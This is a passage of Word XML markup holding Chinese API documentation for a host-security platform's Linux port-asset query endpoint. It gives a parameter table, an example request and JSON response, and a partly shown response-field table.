          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1FC407E7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B4674A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08F5EB56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D51EC6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AE7F58E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="44E55B09" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E6FEF0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6732A029" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C3727F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B047411" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3779CC5F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE23E37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B798491" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FDF9E8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20D21B9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C67B3A0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56A221CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24F734F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AB71DB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DFB4A8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4BD4D58E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4162E800" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>proto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A6B30E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D3FCCC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="239FFDB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4DA7E201" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F118965" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ED0B53F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47C5E54A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DFA1297" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1764041D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C960E37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bindIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63AC2341" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DD15532" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42BE3E2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>绑定</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="431A9DE4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72FE961D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>processName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BD1BE9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="288A4C0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C945F58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F281562" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC93D78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/port/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux?agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=70db8ef89e9ae79a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164821F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684B3CC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId":39,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remark":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test-test000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname":"qingteng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "proto":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port":41935,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pid":4906,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>processName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"java(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>com.intellij.idea.Main</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bindIp":"127.0.0.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29673513"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519"/>
        <w:gridCol w:w="1133"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5885"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3686EED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76BD5C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EF4C56C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F46BEF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2817DD06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35FBC449" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7186A39F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="553FF6F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11F1F9EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B0E1301" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6493257C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16A603D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79EDB7A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FAB6121" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CB9F259" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>显示IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2AFCF69D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C11E820" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56030AE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DC66D14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50536956" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C3A4ACF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="458DADDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6753E667" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18BAE592" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5505D7F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3D633822" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4354D69E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28BA4910" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D91A03D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26BD0B32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="05528F7B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="226D4852" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="557C2EB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1818A315" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
